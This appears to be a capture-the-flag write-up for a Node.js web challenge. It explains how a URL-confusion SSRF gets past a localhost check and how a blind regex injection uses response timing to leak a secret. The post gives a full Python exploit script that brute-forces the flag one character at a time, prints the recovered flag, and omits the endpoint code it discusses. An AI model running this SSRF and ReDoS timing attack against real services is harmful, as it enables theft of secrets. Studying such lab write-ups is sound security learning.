Expressional Rebel was a very entertaining medium web challenge, the solution involved exploiting a url Uconfusion vulnerability along with a regex injection, something I believe most have not tinkered with (at least it wasn't the case for me!)
The vulnerable application was written in NodeJS, in this case we are provided the source code, which was crucial for this kind of challenge or it would've been pretty insane to solve!
Let's dig through some of the code of the challenge and identify vulnerabilities.
Endpoints
There are two interesting endpoints in this application, the first one in api.js:
This endpoint validates the secret which in this case is the flag. We can see that this endpint has a isLocal middleware, this checks that the request is coming from localhost with the following function:
URL confusion is a vulnerability which arises from the non-standardized implementations of url parsing functions. In this case we want to make sure that isLocalhost does not resolve our URL to have a localhost hostname, however that the httpGet functionality actually reaches 127.0.0.1
Is there a way we can get information about env.FLAG while controlling only secret?
It turns out we can use complex regexes and the response time give us information about whether we got partial of the secret correctly. If you wanna learn more about this vulnerability I suggest you read: https://diary.shift-js.info/blind-regular-expression-injection/ . It explains this in great detail.
Using this technique we can bruteforce the flag character by character, using our SSRF to call the endpoint.
Here is the script I ended up using, mostly by modifying a PoC from the aforementioned blog post.
import requests
import random
import string
import re
ENDPOINT = "http://139.59.189.31:30334"
INITIAL = "HTB{"
# constants
THRESHOLD = 2
# predicates
def length_is(n):
return ".{" + str(n) + "}$"
def nth_char_is(n, c):
return ".{" + str(n-1) + "}" + re.escape(c) + ".*$"
# utilities
def redos_if(regexp, salt):
return "^(?={})(((.*)*)*)*{}".format(regexp, salt)
def get_request_duration(payload):
payload = {
"csp": "img-src https: data:;foobar-src 'foobar'; report-uri http:\\\/127.0.0.1:1337/deactivate?secretCode={}".format(payload)
}
r = requests.post(ENDPOINT + "/api/evaluate", json=payload)
print(r.elapsed.total_seconds())
return r.elapsed.total_seconds()
def prop_holds(prop, salt):
return get_request_duration(redos_if(prop, salt)) > THRESHOLD
def generate_salt():
return ''.join([random.choice(string.ascii_letters) for i in range(10)])
# exploit
if __name__ == '__main__':
# generating salt
salt = generate_salt()
while not prop_holds('.*', salt):
salt = generate_salt()
print("[+] salt: {}".format(salt))
# leak length
upper_bound = 100
secret_length = 0
for i in range(0, upper_bound):
if prop_holds(length_is(i), salt):
secret_length = i
print("[+] length: {}".format(secret_length))
S = string.printable
black = "#&;,"
secret = INITIAL
for i in range(4, secret_length):
for c in S:
if c in black:
continue
if prop_holds(nth_char_is(i+1, c), salt):
secret += c
print("[*] {}".format(secret))
print("[+] secret: {}".format(secret))
I'm sure you could optimize this script quite a bit, however after some time I got the flag!
HTB{b4cKtR4ck1ng_4Nd_P4rs3Rs_4r3_fuNnY}
Conclusion
This was a really nice challenge that touched on some vulnerabilities which were pretty unknown to me. I hope you enjoyed it as much as I did and I hope you found this blogpost useful!
